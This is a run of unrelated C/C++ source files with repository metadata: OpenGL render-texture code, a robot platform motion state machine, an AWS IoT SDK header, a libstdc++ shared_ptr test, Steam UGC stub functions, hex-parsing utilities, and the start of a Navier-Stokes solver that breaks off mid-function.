newTexture(new RenderTexture2D(width, height, settings, fmt)); return newTexture; } // ---------------------------------------------------------------------------------------------------------------- // ---------------------------------------------------------------------------------------------------------------- /** * Overload of createRenderTexture2D which accepts pixel data to use to initialize the render texture's contents * * NOTE: Format of the pixelData needs to match the width/height/format arguments */ RenderTexture2DPtr createRenderTexture2D(unsigned int rttWidth, unsigned int rttHeight, TextureInMemoryColorspace fmt, unsigned char *pixelData) { RenderTexture2DPtr newTexture(new RenderTexture2D(rttWidth, rttHeight, pixelData, fmt )); return newTexture; } // ---------------------------------------------------------------------------------------------------------------- // ---------------------------------------------------------------------------------------------------------------- /** * Allocates a new buffer and reads this texture's framebuffer contents into --CPU-- memory. * * Pixel format may differ from requested and could be 16 or 32-bit. * * @NOTE: It's up the the caller to delete the allocated buffer when done with it. */ unsigned char *RenderTexture2D::createScreenGrab(unsigned int *outWidth, unsigned int *outHeight, GLenum *outGlPixelFormat) { // populate caller args so it knows what we are handing back to them *outWidth = width_; *outHeight = height_; *outGlPixelFormat = mType; const int bpp = ((mType == GL_UNSIGNED_BYTE) ? 4 : 2); // bytes per pixel const int bufSize = width_ * height_ * bpp; // allocate the buffer for the user // - this will reside in CPU memory not GPU (ie, not a GL texture) unsigned char *cpuBuffer = new unsigned char[bufSize]; if ( cpuBuffer == NULL ) { return NULL; } // We don't know what the caller wants to do with the results or, more significantly, when it's calling us. // But we should make sure we read a clean image before reading and returning result. glFinish(); // Bind ourself as the active framebuffer and read in the data this->bind(); glReadPixels(0, 0, width_, height_, mFormat, mType, cpuBuffer); this->unbind(); return cpuBuffer; } }
e5172a9501f9b007f0a64aa5fb1000a77a1e3003
d70d0a6a79e03dda8288659a5926f9e794d06780
/robot_platform/RobotPlatformController.cpp
8155109a9f23226c817a5b97d21e1e0bac98802d
[]
no_license
souravran/RobotController
be846f2cf683452cd5404d0039b935a20e4ec218
aa29b8bb4bf8c8fbb2a57f69ed0f19a83d7fb2ca
refs/heads/master
2016-09-13T16:02:09.760969
2016-05-30T14:45:46
2016-05-30T14:45:46
56,391,471
0
0
null
null
null
null
UTF-8
C++
false
false
12,889
cpp
// Copyright [2015] Avantys Engineering GmbH & CoKG //----------------------------------------------------------------------------- // Project Includes //----------------------------------------------------------------------------- #include <robot_platform/RobotPlatformController.h> //----------------------------------------------------------------------------- // Global Includes //----------------------------------------------------------------------------- namespace accmetnavigation { //! Wait time for iteratively checking hardware connection and health status #define CONNECT_TIMEOUT_SECONDS 10 #define HW_STATUS_TIMEOUT_SECONDS 10 RobotPlatformController::~RobotPlatformController() { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; } MotionStates RobotPlatformController::GetState() { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; return mCurrentMotionState; } void RobotPlatformController::RequestState(MotionStates pRequestedState) { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; mRequestedState = pRequestedState; mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; } void RobotPlatformController::RequestMotion(double pRequestedRelativeDistance, double pRequestedVelocity) { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; mRequestedRelativeDistance = pRequestedRelativeDistance; mRequestedVelocity = pRequestedVelocity; mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; } void RobotPlatformController::RequestDirection(std::string pDirection) { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; mDirection = pDirection; mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; } void RobotPlatformController::Update() { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; HandleFSM(); mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; } void RobotPlatformController::SetHWStatusConnFlags(uint16_t pOptionFlag) { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; mHWStatusConnFlags |= pOptionFlag; mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; } void RobotPlatformController::UnsetHWStatusConnFlags(uint16_t pOptionFlag) { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; mHWStatusConnFlags &= ~pOptionFlag; mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; } void RobotPlatformController::HandleFSM() { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; (this->*mPlatformState)(); mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; } void RobotPlatformController::SetState(State pPlatfomrState) { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; mPlatformState = pPlatfomrState; mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; } void RobotPlatformController::StateInit() { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; SetState(&RobotPlatformController::StateConnect); mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; } void RobotPlatformController::StateConnect() { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; ConnectionCheck(); if ((mHWStatusConnFlags & CONN_FLAG) > 0) { SetState(&RobotPlatformController::StateHWStatus); } else { mLogger << log4cpp::Priority::DEBUG << __func__ << ": Hardware connection failed !"; mStartTime = boost::posix_time::microsec_clock::local_time(); SetState(&RobotPlatformController::StateHWDisconnect); } mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; } void RobotPlatformController::StateHWStatus() { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; ConnectionCheck(); HWStatusCheck(); if ((mHWStatusConnFlags & (CONN_FLAG | HW_STATUS_FLAG)) == (CONN_FLAG | HW_STATUS_FLAG)) { mRequestedState = MotionStates::NONE; SetState(&RobotPlatformController::StateUninitialized); } else if ((mHWStatusConnFlags & CONN_FLAG) == 0) { mLogger << log4cpp::Priority::DEBUG << __func__ << ": Hardware connection failed !"; SetState(&RobotPlatformController::StateConnect); } else if ((mHWStatusConnFlags & HW_STATUS_FLAG) == 0) { mLogger << log4cpp::Priority::DEBUG << __func__ << ": Hardware health status is not okay !"; mStartTime = boost::posix_time::microsec_clock::local_time(); SetState(&RobotPlatformController::StateHWError); } mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; } void RobotPlatformController::StateUninitialized() { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; ConnectionCheck(); HWStatusCheck(); if ((mHWStatusConnFlags & (CONN_FLAG | HW_STATUS_FLAG)) == (CONN_FLAG | HW_STATUS_FLAG)) { mCurrentMotionState = MotionStates::UNINITIALIZED; if (mRequestedState == MotionStates::INITIALIZED) { mLogger << log4cpp::Priority::DEBUG << __func__ << ": Starting robot homing process..."; SetState(&RobotPlatformController::StateStartinitialize); } } else if ((mHWStatusConnFlags & CONN_FLAG) == 0) { SetState(&RobotPlatformController::StateConnect); } else if ((mHWStatusConnFlags & HW_STATUS_FLAG) == 0) { SetState(&RobotPlatformController::StateHWStatus); } mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; } void RobotPlatformController::StateStartinitialize() { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; ConnectionCheck(); HWStatusCheck(); // start robot homing process only when hardware is connected and hardware health status is okay // in addition to that, the INIT_FLAG is not set if ((mHWStatusConnFlags & (CONN_FLAG | HW_STATUS_FLAG)) == (CONN_FLAG | HW_STATUS_FLAG)) { if ((mRequestedState == MotionStates::INITIALIZED) && (mCurrentMotionState == MotionStates::UNINITIALIZED) && ((mHWStatusConnFlags & INIT_FLAG) == 0)) { Initialize(); mRequestedState = MotionStates::NONE; SetState(&RobotPlatformController::StateWaitInitialize); } } else if ((mHWStatusConnFlags & CONN_FLAG) == 0) { SetState(&RobotPlatformController::StateConnect); } else if ((mHWStatusConnFlags & HW_STATUS_FLAG) == 0) { SetState(&RobotPlatformController::StateHWStatus); } mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; } void RobotPlatformController::StateWaitInitialize() { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; ConnectionCheck(); HWStatusCheck(); if ((mHWStatusConnFlags & (CONN_FLAG | HW_STATUS_FLAG)) == (CONN_FLAG | HW_STATUS_FLAG)) { // as we wait for robot homing, we check initialization is done and INIT_FLAG is set InitializationCheck(); mCurrentMotionState = MotionStates::INITIALIZING; // during robot in motion, for emergency halt, we immediately stop the robot if (mRequestedState == MotionStates::HALTED) { mRequestedState = MotionStates::NONE; SetState(&RobotPlatformController::StateHalted); } else if ((mHWStatusConnFlags & INIT_FLAG) > 0) { mRequestedState = MotionStates::NONE; mRequestedRelativeDistance = 0; mRequestedVelocity = 0; mDirection.clear(); mCurrentMotionState = MotionStates::INITIALIZED; SetState(&RobotPlatformController::StateStopped); } } else if ((mHWStatusConnFlags & CONN_FLAG) == 0) { SetState(&RobotPlatformController::StateConnect); } else if ((mHWStatusConnFlags & HW_STATUS_FLAG) == 0) { SetState(&RobotPlatformController::StateHWStatus); } mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; } void RobotPlatformController::StateStopped() { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; ConnectionCheck(); HWStatusCheck(); if ((mHWStatusConnFlags & (CONN_FLAG | HW_STATUS_FLAG)) == (CONN_FLAG | HW_STATUS_FLAG)) { mCurrentMotionState = MotionStates::STOPPED; if (mRequestedState == MotionStates::HALTED) { SetState(&RobotPlatformController::StateHalted); } else if (mRequestedState == MotionStates::MOVING) { SetState(&RobotPlatformController::StateStartMoving); } } else if ((mHWStatusConnFlags & CONN_FLAG) == 0) { SetState(&RobotPlatformController::StateConnect); } else if ((mHWStatusConnFlags & HW_STATUS_FLAG) == 0) { SetState(&RobotPlatformController::StateHWStatus); } mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; } void RobotPlatformController::StateHalted() { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; Stop(); // After the Stop command the HALT_FLAG should have been set, then we check the flag and switch to StateStopped if ((mHWStatusConnFlags & HALT_FLAG) > 0) { mRequestedState = MotionStates::NONE; mRequestedRelativeDistance = 0; mRequestedVelocity = 0; SetState(&RobotPlatformController::StateStopped); } mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; } void RobotPlatformController::StateStartMoving() { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; ConnectionCheck(); HWStatusCheck(); if ((mHWStatusConnFlags & (CONN_FLAG | HW_STATUS_FLAG)) == (CONN_FLAG | HW_STATUS_FLAG)) { if (!mDirection.empty()) { SwitchDirection(mDirection); mDirection.clear(); } if ((mRequestedRelativeDistance != 0) && (mRequestedVelocity > 0)) { mRequestedState = MotionStates::NONE; MoveRelative(mRequestedRelativeDistance, mRequestedVelocity); SetState(&RobotPlatformController::StateMoving); } } else if ((mHWStatusConnFlags & CONN_FLAG) == 0) { SetState(&RobotPlatformController::StateConnect); } else if ((mHWStatusConnFlags & HW_STATUS_FLAG) == 0) { SetState(&RobotPlatformController::StateHWStatus); } mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; } void RobotPlatformController::StateMoving() { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; ConnectionCheck(); HWStatusCheck(); if ((mHWStatusConnFlags & (CONN_FLAG | HW_STATUS_FLAG)) == (CONN_FLAG | HW_STATUS_FLAG)) { MotionCheck(); if (mRequestedState == MotionStates::HALTED) { SetState(&RobotPlatformController::StateHalted); } else if ((mHWStatusConnFlags & MOTION_FLAG) > 0) { mCurrentMotionState = MotionStates::MOVING; } else if ((mHWStatusConnFlags & MOTION_FLAG) == 0) { mRequestedState = MotionStates::NONE; mRequestedRelativeDistance = 0; mRequestedVelocity = 0; SetState(&RobotPlatformController::StateStopped); } } else if ((mHWStatusConnFlags & CONN_FLAG) == 0) { SetState(&RobotPlatformController::StateConnect); } else if ((mHWStatusConnFlags & HW_STATUS_FLAG) == 0) { SetState(&RobotPlatformController::StateHWStatus); } mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; } void RobotPlatformController::StateHWDisconnect() { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; if ((boost::posix_time::microsec_clock::local_time() - mStartTime) > boost::posix_time::seconds(CONNECT_TIMEOUT_SECONDS)) { mLogger << log4cpp::Priority::DEBUG << __func__ << ": Trying to connect hardware... "; SetState(&RobotPlatformController::StateConnect); } else { mLogger << log4cpp::Priority::DEBUG << __func__ << ": Waiting for re-establishing hardware connection for " << boost::posix_time::microsec_clock::local_time() - mStartTime << " Seconds"; } mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; } void RobotPlatformController::StateHWError() { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; if ((boost::posix_time::microsec_clock::local_time() - mStartTime) > boost::posix_time::seconds(HW_STATUS_TIMEOUT_SECONDS)) { mLogger << log4cpp::Priority::DEBUG << __func__ << ": Trying to check hardware health status... "; SetState(&RobotPlatformController::StateHWStatus); } else { mLogger << log4cpp::Priority::DEBUG << __func__ << ": Waiting to check hardware status for " << boost::posix_time::microsec_clock::local_time() - mStartTime << " Seconds"; } mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; } RobotPlatformController::RobotPlatformController() : mLogger(log4cpp::Category::getInstance("RobotPlatformController")) , mCurrentMotionState(MotionStates::NONE) , mPlatformState(0) , mHWStatusConnFlags(0) , mStartTime() , mRequestedRelativeDistance(0) , mRequestedVelocity(0) , mDirection() { mLogger << log4cpp::Priority::DEBUG << __func__ << ": ENTRY "; SetState(&RobotPlatformController::StateInit); mLogger << log4cpp::Priority::DEBUG << __func__ << ": EXIT "; } } /* namespace accmetnavigation */
7bff19c69347999708d930742bea68c2595a1ce0
6ced41da926682548df646099662e79d7a6022c5
/aws-cpp-sdk-iot/include/aws/iot/model/ListFleetMetricsRequest.h
19db39e9b85da5da0a0480b8324db6bc263a77ee
[ "Apache-2.0", "MIT", "JSON" ]
permissive
irods/aws-sdk-cpp
139104843de529f615defa4f6b8e20bc95a6be05
2c7fb1a048c96713a28b730e1f48096bd231e932
refs/heads/main
2023-07-25T12:12:04.363757
2022-08-26T15:33:31
2022-08-26T15:33:31
141,315,346
0
1
Apache-2.0
2022-08-26T17:45:09
2018-07-17T16:24:06
C++
UTF-8
C++
false
false
4,438
h
/** * Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. * SPDX-License-Identifier: Apache-2.0. */ #pragma once #include <aws/iot/IoT_EXPORTS.h> #include <aws/iot/IoTRequest.h> #include <aws/core/utils/memory/stl/AWSString.h> #include <utility> namespace Aws { namespace Http { class URI; } //namespace Http namespace IoT { namespace Model { /** */ class AWS_IOT_API ListFleetMetricsRequest : public IoTRequest { public: ListFleetMetricsRequest(); // Service request name is the Operation name which will send this request out, // each operation should has unique request name, so that we can get operation's name from this request. // Note: this is not true for response, multiple operations may have the same response name, // so we can not get operation's name from response. inline virtual const char* GetServiceRequestName() const override { return "ListFleetMetrics"; } Aws::String SerializePayload() const override; void AddQueryStringParameters(Aws::Http::URI& uri) const override; /** * <p>To retrieve the next set of results, the <code>nextToken</code> value from a * previous response; otherwise <code>null</code> to receive the first set of * results.</p> */ inline const Aws::String& GetNextToken() const{ return m_nextToken; } /** * <p>To retrieve the next set of results, the <code>nextToken</code> value from a * previous response; otherwise <code>null</code> to receive the first set of * results.</p> */ inline bool NextTokenHasBeenSet() const { return m_nextTokenHasBeenSet; } /** * <p>To retrieve the next set of results, the <code>nextToken</code> value from a * previous response; otherwise <code>null</code> to receive the first set of * results.</p> */ inline void SetNextToken(const Aws::String& value) { m_nextTokenHasBeenSet = true; m_nextToken = value; } /** * <p>To retrieve the next set of results, the <code>nextToken</code> value from a * previous response; otherwise <code>null</code> to receive the first set of * results.</p> */ inline void SetNextToken(Aws::String&& value) { m_nextTokenHasBeenSet = true; m_nextToken = std::move(value); } /** * <p>To retrieve the next set of results, the <code>nextToken</code> value from a * previous response; otherwise <code>null</code> to receive the first set of * results.</p> */ inline void SetNextToken(const char* value) { m_nextTokenHasBeenSet = true; m_nextToken.assign(value); } /** * <p>To retrieve the next set of results, the <code>nextToken</code> value from a * previous response; otherwise <code>null</code> to receive the first set of * results.</p> */ inline ListFleetMetricsRequest& WithNextToken(const Aws::String& value) { SetNextToken(value); return *this;} /** * <p>To retrieve the next set of results, the <code>nextToken</code> value from a * previous response; otherwise <code>null</code> to receive the first set of * results.</p> */ inline ListFleetMetricsRequest& WithNextToken(Aws::String&& value) { SetNextToken(std::move(value)); return *this;} /** * <p>To retrieve the next set of results, the <code>nextToken</code> value from a * previous response; otherwise <code>null</code> to receive the first set of * results.</p> */ inline ListFleetMetricsRequest& WithNextToken(const char* value) { SetNextToken(value); return *this;} /** * <p>The maximum number of results to return in this operation.</p> */ inline int GetMaxResults() const{ return m_maxResults; } /** * <p>The maximum number of results to return in this operation.</p> */ inline bool MaxResultsHasBeenSet() const { return m_maxResultsHasBeenSet; } /** * <p>The maximum number of results to return in this operation.</p> */ inline void SetMaxResults(int value) { m_maxResultsHasBeenSet = true; m_maxResults = value; } /** * <p>The maximum number of results to return in this operation.</p> */ inline ListFleetMetricsRequest& WithMaxResults(int value) { SetMaxResults(value); return *this;} private: Aws::String m_nextToken; bool m_nextTokenHasBeenSet; int m_maxResults; bool m_maxResultsHasBeenSet; }; } // namespace Model } // namespace IoT } // namespace Aws
4def529b8ec4948189d62b10bf2e591bc353ebd9
51635684d03e47ebad12b8872ff469b83f36aa52
/external/gcc-12.1.0/libstdc++-v3/testsuite/20_util/shared_ptr/cons/weak_ptr_expired.cc
8015d136d0ef52f67e4bf67facdc606f5a5ea8f2
[ "LGPL-2.1-only", "GPL-3.0-only", "GCC-exception-3.1", "GPL-2.0-only", "LGPL-3.0-only", "LGPL-2.0-or-later", "Zlib", "LicenseRef-scancode-public-domain" ]
permissive
zhmu/ananas
8fb48ddfe3582f85ff39184fc7a3c58725fe731a
30850c1639f03bccbfb2f2b03361792cc8fae52e
refs/heads/master
2022-06-25T10:44:46.256604
2022-06-12T17:04:40
2022-06-12T17:04:40
30,108,381
59
8
Zlib
2021-09-26T17:30:30
2015-01-31T09:44:33
C
UTF-8
C++
false
false
1,432
cc
// { dg-do run { target c++11 } } // Copyright (C) 2005-2022 Free Software Foundation, Inc. // // This file is part of the GNU ISO C++ Library. This library is free // software; you can redistribute it and/or modify it under the // terms of the GNU General Public License as published by the // Free Software Foundation; either version 3, or (at your option) // any later version. // This library is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // You should have received a copy of the GNU General Public License along // with this library; see the file COPYING3. If not see // <http://www.gnu.org/licenses/>. // 20.6.6.2 Template class shared_ptr [util.smartptr.shared] #include <memory> #include <string> #include <testsuite_hooks.h> struct A { }; // 20.6.6.2.1 shared_ptr constructors [util.smartptr.shared.const] // Construction from expired weak_ptr int test01() { bool test = false; std::shared_ptr<A> a1(new A); std::weak_ptr<A> wa(a1); a1.reset(); VERIFY( wa.expired() ); try { std::shared_ptr<A> a2(wa); } catch (const std::bad_weak_ptr& e) { // Expected. if (e.what() == std::string("bad_weak_ptr")) test = true; } VERIFY( test ); return 0; } int main() { test01(); return 0; }
542bc9d5e7fdc5a9afaeecdd35a40111728ca746
d4a854fdf78282232739a23d0a2ea80f8fccf14a
/Source/Steam/Classes/RedactedUGC.cpp
05cfa7d62cc1249713fea388ccb193fc17458667
[]
no_license
GEEKiDoS/SteamBase
7f7ac61092d1ea71f8ace0f662e5b4a692b0d08f
771aa55e47d2ab662d5961a354ab1dcdd7567cd9
refs/heads/master
2021-06-20T05:00:33.924486
2017-08-09T20:16:38
2017-08-09T20:16:38
null
0
0
null
null
null
null
UTF-8
C++
false
false
4,838
cpp
/* This project is released under the GPL 2.0 license. Some parts are based on research by Bas Timmer and the OpenSteamworks project. Please do no evil. Initial author: (https://github.com/)Convery Started: 2014-11-04 Notes: Utils. */ #include "..\..\StdInclude.h" UGCQueryHandle_t RedactedUGC::CreateQueryUserUGCRequest(AccountID_t unAccountID, EUserUGCList eListType, EUGCMatchingUGCType eMatchingUGCType, EUserUGCListSortOrder eSortOrder, AppId_t nCreatorAppID, AppId_t nConsumerAppID, uint32 unPage) { PrintCurrentFunction(); return NULL; } UGCQueryHandle_t RedactedUGC::CreateQueryAllUGCRequest(EUGCQuery eQueryType, EUGCMatchingUGCType eMatchingeMatchingUGCTypeFileType, AppId_t nCreatorAppID, AppId_t nConsumerAppID, uint32 unPage) { PrintCurrentFunction(); return NULL; } SteamAPICall_t RedactedUGC::SendQueryUGCRequest(UGCQueryHandle_t handle) { PrintCurrentFunction(); return NULL; } bool RedactedUGC::GetQueryUGCResult(UGCQueryHandle_t handle, uint32 index, SteamUGCDetails_t *pDetails) { PrintCurrentFunction(); return false; } bool RedactedUGC::ReleaseQueryUGCRequest(UGCQueryHandle_t handle) { PrintCurrentFunction(); return false; } bool RedactedUGC::AddRequiredTag(UGCQueryHandle_t handle, const char *pTagName) { PrintCurrentFunction(); return false; } bool RedactedUGC::AddExcludedTag(UGCQueryHandle_t handle, const char *pTagName) { PrintCurrentFunction(); return false; } bool RedactedUGC::SetReturnLongDescription(UGCQueryHandle_t handle, bool bReturnLongDescription) { PrintCurrentFunction(); return false; } bool RedactedUGC::SetReturnTotalOnly(UGCQueryHandle_t handle, bool bReturnTotalOnly) { PrintCurrentFunction(); return false; } bool RedactedUGC::SetAllowCachedResponse(UGCQueryHandle_t handle, uint32 unMaxAgeSeconds) { PrintCurrentFunction(); return false; } bool RedactedUGC::SetCloudFileNameFilter(UGCQueryHandle_t handle, const char *pMatchCloudFileName) { PrintCurrentFunction(); return false; } bool RedactedUGC::SetMatchAnyTag(UGCQueryHandle_t handle, bool bMatchAnyTag) { PrintCurrentFunction(); return false; } bool RedactedUGC::SetSearchText(UGCQueryHandle_t handle, const char *pSearchText) { PrintCurrentFunction(); return false; } bool RedactedUGC::SetRankedByTrendDays(UGCQueryHandle_t handle, uint32 unDays) { PrintCurrentFunction(); return NULL; } SteamAPICall_t RedactedUGC::RequestUGCDetails(PublishedFileId_t nPublishedFileID, uint32 unMaxAgeSeconds) { PrintCurrentFunction(); return NULL; } SteamAPICall_t RedactedUGC::CreateItem(AppId_t nConsumerAppId, EWorkshopFileType eFileType) { PrintCurrentFunction(); return NULL; } UGCUpdateHandle_t RedactedUGC::StartItemUpdate(AppId_t nConsumerAppId, PublishedFileId_t nPublishedFileID) { PrintCurrentFunction(); return NULL; } bool RedactedUGC::SetItemTitle(UGCUpdateHandle_t handle, const char *pchTitle) { PrintCurrentFunction(); return false; } bool RedactedUGC::SetItemDescription(UGCUpdateHandle_t handle, const char *pchDescription) { PrintCurrentFunction(); return false; } bool RedactedUGC::SetItemVisibility(UGCUpdateHandle_t handle, ERemoteStoragePublishedFileVisibility eVisibility) { PrintCurrentFunction(); return false; } bool RedactedUGC::SetItemTags(UGCUpdateHandle_t updateHandle, const SteamParamStringArray_t *pTags) { PrintCurrentFunction(); return false; } bool RedactedUGC::SetItemContent(UGCUpdateHandle_t handle, const char *pszContentFolder) { PrintCurrentFunction(); return false; } bool RedactedUGC::SetItemPreview(UGCUpdateHandle_t handle, const char *pszPreviewFile) { PrintCurrentFunction(); return false; } SteamAPICall_t RedactedUGC::SubmitItemUpdate(UGCUpdateHandle_t handle, const char *pchChangeNote) { PrintCurrentFunction(); return NULL; } EItemUpdateStatus RedactedUGC::GetItemUpdateProgress(UGCUpdateHandle_t handle, uint64 *punBytesProcessed, uint64* punBytesTotal) { PrintCurrentFunction(); return k_EItemUpdateStatusInvalid; } SteamAPICall_t RedactedUGC::SubscribeItem(PublishedFileId_t nPublishedFileID) { PrintCurrentFunction(); return NULL; } SteamAPICall_t RedactedUGC::UnsubscribeItem(PublishedFileId_t nPublishedFileID) { PrintCurrentFunction(); return NULL; } uint32 RedactedUGC::GetNumSubscribedItems() { PrintCurrentFunction(); return NULL; } uint32 RedactedUGC::GetSubscribedItems(PublishedFileId_t* pvecPublishedFileID, uint32 cMaxEntries) { PrintCurrentFunction(); return NULL; } bool RedactedUGC::GetItemInstallInfo(PublishedFileId_t nPublishedFileID, uint64 *punSizeOnDisk, char *pchFolder, uint32 cchFolderSize, bool *pbLegacyItem) { PrintCurrentFunction(); return false; } bool RedactedUGC::GetItemUpdateInfo(PublishedFileId_t nPublishedFileID, bool *pbNeedsUpdate, bool *pbIsDownloading, uint64 *punBytesDownloaded, uint64 *punBytesTotal) { PrintCurrentFunction(); return false; }
a6e49a0ffba85aec0fd95149ed6f035a44d390cd
e7529fb1566be4f9eb99a0249f8293ace786fcd5
/MjpegReceiver/strutils.h
5ec88e7d9ee2f587aadb36c8635906b00517b430
[ "CC0-1.0" ]
permissive
sipsorcery/prototypes
c8d332ce888ff495d94a1a698768a198c417f164
614adf6c2346adb0038750c775ebe4e423c69a96
refs/heads/master
2021-07-15T19:58:02.770195
2021-03-16T20:54:08
2021-03-16T20:54:08
237,002,369
1
1
null
null
null
null
UTF-8
C++
false
false
3,280
h
//----------------------------------------------------------------------------- // Filename: strutils.h // // Description: Useful string utilities originally from Bitcoin Core. // // Copyright (c) 2009-2010 Satoshi Nakamoto // Copyright (c) 2009-2017 The Bitcoin Core developers // Distributed under the MIT software license, see the accompanying // file COPYING or http://www.opensource.org/licenses/mit-license.php. //----------------------------------------------------------------------------- #ifndef STRUTILS_H #define STRUTILS_H #include <iomanip> #include <sstream> #include <string> #include <vector> namespace { const signed char p_util_hexdigit[256] = { -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, -1, -1, -1, -1, -1, -1, -1, 0xa, 0xb, 0xc, 0xd, 0xe, 0xf, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 0xa, 0xb, 0xc, 0xd, 0xe, 0xf, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, }; signed char HexDigit(char c) { return p_util_hexdigit[(unsigned char)c]; } bool IsHex(const std::string& str) { for (std::string::const_iterator it(str.begin()); it != str.end(); ++it) { if (HexDigit(*it) < 0) return false; } return (str.size() > 0) && (str.size() % 2 == 0); } bool IsHexNumber(const std::string& str) { size_t starting_location = 0; if (str.size() > 2 && *str.begin() == '0' && *(str.begin() + 1) == 'x') { starting_location = 2; } for (auto c : str.substr(starting_location)) { if (HexDigit(c) < 0) return false; } // Return false for empty string or "0x". return (str.size() > starting_location); } std::vector<uint8_t> ParseHex(const char* psz) { // convert hex dump to vector std::vector<unsigned char> vch; while (true) { while (isspace(*psz)) psz++; signed char c = HexDigit(*psz++); if (c == (signed char)-1) break; unsigned char n = (c << 4); c = HexDigit(*psz++); if (c == (signed char)-1) break; n |= c; vch.push_back(n); } return vch; } std::vector<uint8_t> ParseHex(const std::string& str) { return ParseHex(str.c_str()); } template < class T > const std::string toHex(const T& begin, const T& end) { std::ostringstream str; for (T it = begin; it != end; ++it) str << std::setw(2) << std::setfill('0') << std::hex << (unsigned)(*it & 0xff); return str.str(); } template < class T > const std::string toHex(const T& v) { return toHex(v.begin(), v.end()); } } #endif STRUTILS_H
ba967141b5137832c82ac0b5838697332f8a1223
d49ebd5ac47cf44c207cc32a2199c50f46bae5d2
/NavierStokes/numerical/numerical.cpp
c9e0b2031aca976863d221b1cca4e1dd57de343a
[]
no_license
j16out/cfd510
feb50bf0bccf407f2f818977696a322cd0b51161
7a9d7ce7bd26b7f1f6b2ff5f28a7b32fd23eea01
refs/heads/master
2020-05-30T07:19:27.581074
2016-12-21T22:07:59
2016-12-21T22:07:59
70,025,661
0
0
null
null
null
null
UTF-8
C++
false
false
33,367
cpp
#include "numerical.hpp" //==========================================================================// //---------------------------Setting Array----------------------------------// //==========================================================================// //-----------set array size (working area excluding ghost)-----------------// void set_array_size(carray & myarray, int x, int y, double DIMx, double DIMy, int scheme) { if(x <= maxx && y <= maxy) { myarray.sizex = x+2; //array size+2 for ghost myarray.sizey = y+2; myarray.DIMx = DIMx/(x);//set dim between cells myarray.DIMy = DIMy/(y); } else cout << "Array size to big, array not set***" << "\n"; } //-----------------------------zero array----------------------------------// void set_zero(carray & myarray) { for(int j = 0; j < myarray.sizey; ++j) { for(int i = 0; i < myarray.sizex; ++i) { //set solution array zero myarray.s1[i][j].P = 0.0; myarray.s1[i][j].u = 0.0; myarray.s1[i][j].v = 0.0; //set flux array zero myarray.f1[i][j].P = 0.0; 